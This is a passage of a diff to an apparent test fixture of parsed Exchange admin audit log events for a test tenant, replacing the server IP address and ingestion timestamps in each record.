bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4645,12 +4645,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -4693,7 +4693,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -4705,8 +4705,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177735Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853278600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4726,12 +4726,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -4763,7 +4763,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -4775,8 +4775,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177737900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853283300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -4796,12 +4796,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -4831,7 +4831,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -4843,8 +4843,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177741100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853288300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -4864,12 +4864,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -4914,7 +4914,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -4926,8 +4926,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177743900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853293300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}",
 "code": "ExchangeAdmin",
 "provider": "Exchange",
 "kind": "event",
@@ -4947,12 +4947,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -4995,7 +4995,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -5007,8 +5007,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177748Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + 
"ingested": "2021-12-09T13:42:30.853299500Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5028,12 +5028,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -5076,7 +5076,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -5088,8 +5088,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177753Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": 
"2021-12-09T13:42:30.853303200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5109,12 +5109,12 @@
 },
 {
 "server": {
- "address": "15.20.207.17",
+ "address": "67.43.156.13",
 "domain": "HE1PR0102MB3228",
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "destination": {
- "ip": "15.20.207.17"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -5157,7 +5157,7 @@
 },
 "related": {
 "ip": [
- "15.20.207.17"
+ "67.43.156.13"
 ]
 },
 "organization": {
